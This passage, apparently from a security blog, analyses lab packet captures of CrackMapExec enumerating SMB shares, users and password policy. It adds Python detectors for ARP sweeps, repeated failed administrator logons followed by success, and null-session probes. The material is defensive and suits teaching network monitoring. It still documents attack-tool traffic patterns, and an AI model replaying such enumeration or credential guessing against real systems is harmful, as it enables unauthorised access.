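def arp_request_profile(rows):
    """Per requesting MAC: how many requests it sent and the set of distinct addresses it asked for."""
    profile = defaultdict(lambda: {"requests": 0, "targets": set()})
    for mac, _src_ip, dst_ip, opcode in rows:
        if opcode == 1:
            profile[mac]["requests"] += 1
            profile[mac]["targets"].add(dst_ip)
    return dict(profile)


def find_sweepers(rows, min_targets=10):
    """MACs that asked for at least min_targets distinct addresses. A sweep is many targets; a host
    retrying one unanswered neighbour (10.0.0.103 above) is many requests for a single target."""
    return sorted(mac for mac, p in arp_request_profile(rows).items() if len(p["targets"]) >= min_targets)


def unanswered_targets(rows):
    """Addresses that were asked for but never replied: the empty slots the scanner walked over."""
    asked = {dst for _mac, _src, dst, op in rows if op == 1}
    answered = {src for _mac, src, _dst, op in rows if op == 2}
    return sorted(asked - answered, key=lambda ip: tuple(int(x) for x in ip.split(".")))


if __name__ == "__main__":
    rows = parse_arp_fields(SAMPLE_ARP_FIELDS)
    for mac, p in arp_request_profile(rows).items():
        print(f"{mac}: {p['requests']} requests, {len(p['targets'])} distinct targets")
    print("sweepers:", find_sweepers(rows))
    print("unanswered:", unanswered_targets(rows))
```

The threshold is deliberately on distinct targets rather than request count, because a single host with a stale neighbour entry generates plenty of ARP requests without ever being a scan. On a real capture, feed it the output of the tshark command above (without "| more") and look at which addresses never answered: those are the ones crackmapexec silently got nothing from.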
Let's now look at what the packets look like as CrackMapExec enumerates the shares.
Let's once again start by looking at the protocol hierarchy:
root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:
eth frames:487 bytes:131203
arp frames:5 bytes:300
ip frames:482 bytes:130903
tcp frames:482 bytes:130903
nbss frames:394 bytes:115138
smb frames:8 bytes:1016
smb2 frames:386 bytes:114122
tcp.segments frames:2 bytes:2764
===================================================================
From above we see both SMB and SMB2 frames. As in the scan capture, the SMB1 frames are the client's Negotiate Protocol Requests, 8 of them for the 8 TCP connections listed below, each answered by the server in SMB2; everything after that is SMB2. The two tcp.segments entries are SMB2 PDUs that were larger than one TCP segment and had to be reassembled.
Let's look into the conversations.
root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
| <- | | -> | | Total | Relative | Duration |
| Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |
10.0.0.100:35710 <-> 10.0.0.105:445 88 32754 95 19205 183 51959 4.701908000 1.3409
10.0.0.100:52026 <-> 10.0.0.103:445 77 32785 88 19170 165 51955 4.702229000 1.3245
10.0.0.100:41024 <-> 10.0.0.3:445 13 3322 17 3681 30 7003 4.778967000 1.2455
10.0.0.100:35716 <-> 10.0.0.105:445 14 2952 15 2945 29 5897 4.797176000 1.2259
10.0.0.100:52032 <-> 10.0.0.103:445 13 3074 15 2883 28 5957 5.162347000 0.8619
10.0.0.100:35708 <-> 10.0.0.105:445 8 1512 10 1154 18 2666 4.658157000 1.3651
10.0.0.100:41016 <-> 10.0.0.3:445 7 1729 8 1030 15 2759 4.657942000 0.1189
10.0.0.100:52018 <-> 10.0.0.103:445 6 1677 8 1030 14 2707 4.657751000 0.0437
================================================================================
Let's do as we did previously and look into one of the conversations. Let's take the first one, with source port 35710.
root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -Y "( ip.addr == 10.0.0.100 ) && ( ip.addr == 10.0.0.105 ) && ( tcp.port ==35710 ) && ( tcp.port == 445 )" | more
35 4.701908 10.0.0.100 → 10.0.0.105 TCP 74 35710 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2860773415 TSecr=0 WS=128
37 4.702292 10.0.0.105 → 10.0.0.100 TCP 66 445 → 35710 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
38 4.702307 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
41 4.703211 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
44 4.706059 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
45 4.706077 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
48 4.709555 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
49 4.710187 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
52 4.719150 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
53 4.719743 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
56 4.728556 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
57 4.731502 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
59 4.734839 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
62 4.736363 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
63 4.753927 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
64 4.756372 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
68 4.760402 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
69 4.761060 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
72 4.772888 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
74 4.775421 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
76 4.778370 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
78 4.779050 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
81 4.786392 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
85 4.789841 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
103 4.829145 10.0.0.105 → 10.0.0.100 TCP 139 [TCP Retransmission] 445 → 35710 [PSH, ACK] Seq=2313 Ack=3016 Win=2100736 Len=85
104 4.829160 10.0.0.100 → 10.0.0.105 TCP 66 35710 → 445 [ACK] Seq=3016 Ack=2398 Win=35712 Len=0 SLE=2313 SRE=2398
118 4.870576 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
119 4.870976 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
120 4.870995 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=3178 Ack=2534 Win=36736 Len=0
...........
463 5.966266 10.0.0.105 → 10.0.0.100 SMB2 182 Encrypted SMB3
464 5.970495 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3
465 5.970824 10.0.0.105 → 10.0.0.100 SMB2 178 Encrypted SMB3
468 6.013389 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [ACK] Seq=14032 Ack=27752 Win=185856 Len=0
484 6.040763 10.0.0.100 → 10.0.0.105 TCP 54 35710 → 445 [FIN, ACK] Seq=14032 Ack=27752 Win=185856 Len=0
485 6.041096 10.0.0.105 → 10.0.0.100 TCP 60 445 → 35710 [ACK] Seq=27752 Ack=14033 Win=2102272 Len=0
486 6.042828 10.0.0.105 → 10.0.0.100 TCP 60 445 → 35710 [RST, ACK] Seq=27752 Ack=14033 Win=0 Len=0
Uh oh!! This communication is encrypted with SMB3: once the session is established, every SMB2 PDU is wrapped in a transform header and shows up only as "Encrypted SMB3", so the tree connect, the share listing and whatever else crackmapexec did here is hidden from us. However, if you pay close attention above, the part before encryption kicks in is still readable. There are three Session Setup Requests with NTLMSSP_AUTH as SECURITYNIK\administrator that come back as STATUS_LOGON_FAILURE (frames 57, 64 and 74), then a fourth attempt (frame 81) that is accepted (frame 85, no error), after which the traffic goes encrypted. That is what credential guessing looks like on the wire, and each of those failures is also a failed logon event on the target, so both network and host monitoring get a shot at it. Let's leave this for now. Do note also that most of the other conversations are much the same.
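Even with the payload encrypted, the Session Setup legs are in the clear, and that is enough to flag the pattern above: three NTLMSSP_AUTH attempts as SECURITYNIK\administrator answered with STATUS_LOGON_FAILURE and a fourth that succeeds. The following is an added example (my code, not the blog's and not crackmapexec's) that extracts those outcomes from tshark's one-line summaries. The sample input is constructed by stitching together lines shown on this page: the null-session logon from cme-scan.pcap (frames 444-448) and the four attempts from this capture (frames 52-85). The same check applies to the user and password-policy captures that follow, where the rest of the traffic is also Encrypted SMB3.

```python
"""Recover NTLM logon outcomes from tshark one-line summaries, even when the rest is Encrypted SMB3."""
import re
from collections import defaultdict

# tshark's default summary line:  frame  time  src → dst  proto  length  info
LINE_RE = re.compile(r"^\s*(\d+)\s+([\d.]+)\s+(\S+) → (\S+)\s+(\S+)\s+(\d+)\s+(.*)$")
AUTH_USER_RE = re.compile(r"NTLMSSP_AUTH, User: (.*)$")
STATUS_RE = re.compile(r"Error: (STATUS_\w+)")

# Constructed sample stitched from two captures on this page: the null-session logon from
# cme-scan.pcap (frames 444-448) and the four logon attempts from cme-enum-shares.pcap (52-85).
SAMPLE_TSHARK_SUMMARY = r"""
444 10.238197 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
446 10.238929 10.0.0.105 → 10.0.0.100 SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
447 10.243642 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
448 10.244629 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
52 4.719150 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
53 4.719743 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
56 4.728556 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
57 4.731502 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
59 4.734839 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
62 4.736363 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
63 4.753927 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
64 4.756372 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
68 4.760402 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
69 4.761060 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
72 4.772888 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
74 4.775421 10.0.0.105 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
76 4.778370 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
78 4.779050 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
81 4.786392 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
85 4.789841 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
118 4.870576 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
"""


def parse_summary(text):
    """One dict per tshark line; blank lines and "..." elisions are ignored."""
    frames = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            frames.append({"no": int(m[1]), "time": float(m[2]), "src": m[3], "dst": m[4],
                           "proto": m[5], "len": int(m[6]), "info": m[7]})
    return frames


def session_setup_outcomes(frames):
    """Pair each NTLMSSP_AUTH request with the Session Setup Response that comes back on the same flow.
    A response carrying STATUS_MORE_PROCESSING_REQUIRED is the CHALLENGE leg, not a verdict."""
    pending = {}      # (client, server) -> (user, request frame) still waiting for a verdict
    outcomes = []
    for f in frames:
        if f["proto"] != "SMB2" or not f["info"].startswith("Session Setup"):
            continue
        um = AUTH_USER_RE.search(f["info"])
        if um:
            user = um[1].strip()
            if user.strip("\\") == "":          # "User: \" is a null (anonymous) session
                user = "<anonymous>"
            pending[(f["src"], f["dst"])] = (user, f["no"])
            continue
        client, server = f["dst"], f["src"]
        if "Response" in f["info"] and (client, server) in pending:
            sm = STATUS_RE.search(f["info"])
            if sm and sm[1] == "STATUS_MORE_PROCESSING_REQUIRED":
                continue
            user, req_no = pending.pop((client, server))
            outcomes.append({"client": client, "server": server, "user": user,
                             "status": sm[1] if sm else "SUCCESS", "request": req_no, "response": f["no"]})
    return outcomes


def guessing_summary(outcomes):
    """Per (server, user): failures seen before the first success. Session Setup happens before any
    session key exists, so this signal survives even when everything after it is Encrypted SMB3."""
    summary = defaultdict(lambda: {"failures": 0, "success": False})
    for o in outcomes:
        entry = summary[(o["server"], o["user"])]
        if o["status"] == "SUCCESS":
            entry["success"] = True
        elif not entry["success"]:
            entry["failures"] += 1
    return dict(summary)


def guessed_credentials(outcomes, min_failures=1):
    """(server, user) pairs that failed at least min_failures times and then got in."""
    return sorted(k for k, v in guessing_summary(outcomes).items()
                  if v["success"] and v["failures"] >= min_failures)


if __name__ == "__main__":
    outs = session_setup_outcomes(parse_summary(SAMPLE_TSHARK_SUMMARY))
    for o in outs:
        print(f'{o["server"]} {o["user"]:28} {o["status"]} (frames {o["request"]}/{o["response"]})')
    print("guessed:", guessed_credentials(outs))
```

On the sample this reports the anonymous logon as a plain success with no failures and SECURITYNIK\administrator as three failures followed by a success, which is the record you want beside the host's own failed-logon events when the SMB payload itself can no longer be inspected.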
Let's now transition to the enumeration of users and groups, to see what we can learn from the packets.
Starting with the conversations, we see 10 of them reported in the pcap file. If we look at the first one, with port 36662, it ties back into our log analysis. Let's take a look at these packets to see what we can learn.
root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
| <- | | -> | | Total | Relative | Duration |
| Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |
10.0.0.100:36662 <-> 10.0.0.105:445 81 20594 78 18654 159 39248 9.171767000 1.2807
10.0.0.100:52980 <-> 10.0.0.103:445 58 15862 60 14173 118 30035 9.321117000 0.6187
10.0.0.100:36660 <-> 10.0.0.105:445 13 2714 15 2933 28 5647 9.060796000 1.3251
10.0.0.100:52978 <-> 10.0.0.103:445 13 3074 15 2887 28 5961 9.208452000 1.1786
10.0.0.100:36652 <-> 10.0.0.105:445 9 1638 10 1166 19 2804 8.944584000 1.5418
10.0.0.100:41964 <-> 10.0.0.3:445 7 1729 11 1451 18 3180 8.997733000 1.4911
10.0.0.100:52972 <-> 10.0.0.103:445 7 1746 11 1459 18 3205 8.998512000 1.4915
10.0.0.100:36656 <-> 10.0.0.105:445 8 1525 9 1409 17 2934 8.998254000 1.5223
10.0.0.100:52962 <-> 10.0.0.103:445 6 1677 8 1030 14 2707 8.944150000 0.0536
10.0.0.100:41960 <-> 10.0.0.3:445 6 1669 8 1030 14 2699 8.944373000 0.0425
================================================================================
Looking at the actual packets now:
root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -Y "( tcp.port == 36662 ) && ( tcp.port == 445 )"
109 9.171767 10.0.0.100 → 10.0.0.105 TCP 74 36662 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2872505954 TSecr=0 WS=128
110 9.172057 10.0.0.105 → 10.0.0.100 TCP 66 445 → 36662 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
111 9.172070 10.0.0.100 → 10.0.0.105 TCP 54 36662 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
113 9.180091 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
115 9.193928 10.0.0.105 → 10.0.0.100 TCP 60 445 → 36662 [ACK] Seq=1 Ack=74 Win=2102272 Len=0
130 9.223667 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
131 9.223681 10.0.0.100 → 10.0.0.105 TCP 54 36662 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
135 9.230843 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
143 9.256814 10.0.0.105 → 10.0.0.100 TCP 60 445 → 36662 [ACK] Seq=253 Ack=184 Win=2102272 Len=0
193 9.550036 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
196 9.554980 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
197 9.557240 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
200 9.572289 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
201 9.574589 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
206 9.591850 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
207 9.593175 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
210 9.607005 10.0.0.100 → 10.0.0.105 SMB2 238 Encrypted SMB3
211 9.607508 10.0.0.105 → 10.0.0.100 SMB2 262 Encrypted SMB3
214 9.617532 10.0.0.100 → 10.0.0.105 SMB2 294 Encrypted SMB3
215 9.617975 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
218 9.628218 10.0.0.100 → 10.0.0.105 SMB2 223 Encrypted SMB3
219 9.628717 10.0.0.105 → 10.0.0.100 SMB2 258 Encrypted SMB3
222 9.639361 10.0.0.100 → 10.0.0.105 SMB2 258 Encrypted SMB3
....
423 10.449068 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3
424 10.449465 10.0.0.105 → 10.0.0.100 SMB2 178 Encrypted SMB3
425 10.451778 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3
426 10.452430 10.0.0.105 → 10.0.0.100 TCP 60 445 → 36662 [RST, ACK] Seq=16173 Ack=14423 Win=0 Len=0
Uh oh. From above we see that this traffic is also encrypted, so the RPC calls that do the actual user and group enumeration are hidden. This makes it difficult for our security monitoring tools to effectively do their jobs. What does remain in the clear is the NTLMSSP exchange, including the account used (SECURITYNIK\administrator, frame 200) and the fact that it succeeded (frame 201), plus the size and timing of the encrypted exchange that follows.
As this session was encrypted too, let's now see what we can get from the packets associated with the password policy enumeration.
Without further ado, let's take a look at the packet capture to see what type of traffic might be in here.
Looking at the protocol hierarchy, we see some SMB and SMB2 traffic:
root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:
eth frames:113 bytes:21694
arp frames:2 bytes:102
ip frames:111 bytes:21592
tcp frames:111 bytes:21592
nbss frames:78 bytes:19550
smb frames:4 bytes:508
smb2 frames:74 bytes:19042
===================================================================
Looking at the above, at first glance I would conclude that there is no encrypted traffic. The protocol hierarchy cannot actually tell us that, though: encrypted SMB3 is still counted under smb2, because the transform header wrapping each encrypted PDU is itself an SMB2 header. Let's see if that is true.
Peeking first into SMB traffic, we see:
root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb"
6 3.214791 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
20 3.237020 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
34 3.279046 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
59 3.394125 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
From above, the SMB packets all seem to be SMB1 Negotiate Protocol Requests, four of them, one per TCP connection to 10.0.0.105. The client's SMB1 negotiate lists SMB2 among the dialects it supports, and the server picks it and replies with an SMB2 Negotiate Protocol Response, which is why we see no further SMB1 traffic.
Let's now look into the SMB2 traffic.
root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb2"
7 3.215534 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
9 3.218110 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
10 3.218617 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
11 3.222438 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
12 3.224476 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
13 3.229892 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
14 3.230867 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
15 3.234048 10.0.0.100 → 10.0.0.105 SMB2 126 Session Logoff Request
16 3.234344 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response
21 3.238371 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
23 3.241025 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
24 3.241635 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
25 3.248880 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
26 3.249527 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
27 3.256058 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
28 3.258185 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
35 3.279840 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
37 3.293799 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
38 3.294739 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
39 3.298425 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
41 3.299181 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
42 3.305931 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
43 3.308715 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
44 3.313429 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
45 3.313913 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
.....
54 3.377248 10.0.0.100 → 10.0.0.105 SMB2 223 Encrypted SMB3
55 3.377657 10.0.0.105 → 10.0.0.100 SMB2 238 Encrypted SMB3
60 3.396247 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
62 3.400194 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
63 3.400920 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
64 3.412338 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
65 3.413306 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
67 3.434020 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
68 3.436640 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
69 3.451598 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
77 3.522068 10.0.0.100 → 10.0.0.105 SMB2 258 Encrypted SMB3
78 3.522898 10.0.0.105 → 10.0.0.100 SMB2 190 Encrypted SMB3
......
99 3.704565 10.0.0.100 → 10.0.0.105 SMB2 223 Encrypted SMB3
100 3.704911 10.0.0.105 → 10.0.0.100 SMB2 246 Encrypted SMB3
Holy smack! Looks like yet another set of encrypted traffic. Well nothing else to see here at this time. Let's move on to see what things look like when we execute remote commands.
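The sequence above (an anonymous Session Setup with an empty user, a logoff, then an authenticated setup from the same client followed shortly by Encrypted SMB3) can be checked for mechanically. This is an added Python example, not code from the post or from CrackMapExec: it parses tshark's summary lines as printed above, and the 5-second window is an assumption chosen for illustration.

```python
import re

# Shape of the tshark summary lines above: frame, time, src → dst, proto, length, info.
LINE_RE = re.compile(
    r"^\s*(\d+)\s+([\d.]+)\s+(\S+)\s+→\s+(\S+)\s+(SMB2?)\s+\d+\s+(.*)$"
)


def parse_tshark_lines(text: str) -> list:
    """Turn `tshark -Y smb2` summary output into dicts; other lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append({"frame": int(m[1]), "time": float(m[2]), "src": m[3],
                         "dst": m[4], "proto": m[5], "info": m[6].strip()})
    return rows


def find_null_then_auth(rows: list, window: float = 5.0) -> list:
    """Per (client, server) pair: a null-session NTLMSSP_AUTH (User: \\)
    followed within `window` seconds by an authenticated Session Setup,
    plus whether Encrypted SMB3 traffic followed the authenticated setup."""
    by_pair = {}
    for r in rows:
        by_pair.setdefault((r["src"], r["dst"]), []).append(r)
    findings = []
    for (client, server), rs in by_pair.items():
        null_at = None
        for r in rs:
            info = r["info"]
            if "NTLMSSP_AUTH" not in info:
                continue
            if info.endswith("User: \\"):
                null_at = r["time"]          # anonymous probe
            elif null_at is not None and r["time"] - null_at <= window:
                findings.append({
                    "client": client, "server": server,
                    "user": info.split("User: ", 1)[1],
                    "null_session_at": null_at, "auth_at": r["time"],
                    "encrypted_after": any(x["info"] == "Encrypted SMB3"
                                           and x["time"] > r["time"] for x in rs),
                })
                null_at = None               # one finding per probe
    return findings


# Sample input: the Session Setup frames and the first Encrypted SMB3 frame
# copied from the tshark output above (frames 11-16, 25-28 and 44).
SAMPLE = """\
11 3.222438 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
12 3.224476 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
13 3.229892 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \\
14 3.230867 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
15 3.234048 10.0.0.100 → 10.0.0.105 SMB2 126 Session Logoff Request
16 3.234344 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response
25 3.248880 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
26 3.249527 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
27 3.256058 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\\administrator
28 3.258185 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
44 3.313429 10.0.0.100 → 10.0.0.105 SMB2 216 Encrypted SMB3
"""

if __name__ == "__main__":
    for f in find_null_then_auth(parse_tshark_lines(SAMPLE)):
        print(f)
```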
Let's now see what the communication looks like when crackmapexec runs a powershell command.
As always, when we first look at our pcap file, we look at the protocol hierarchy to understand what is in the file. Let's do that.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:
eth frames:247 bytes:82427
arp frames:8 bytes:408
ip frames:239 bytes:82019
udp frames:4 bytes:860
ssdp frames:4 bytes:860
tcp frames:235 bytes:81159
nbss frames:121 bytes:29648
smb frames:3 bytes:381
smb2 frames:118 bytes:29267
tcp.segments frames:1 bytes:2742
dcerpc frames:31 bytes:40114
isystemactivator frames:2 bytes:1644
remunk frames:2 bytes:300
dcerpc.stub_data frames:5 bytes:21630
dcerpc.fragments frames:1 bytes:790
===================================================================
Looking at the SMB communication below, we see once again that this is more than likely the client trying to communicate via SMB version 1.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb"
16 43.408475 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
30 43.435753 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
42 43.463106 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
Once again let's look at the SMB2 communication.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb2"
17 43.409255 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
19 43.413105 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
20 43.413704 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
21 43.418281 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
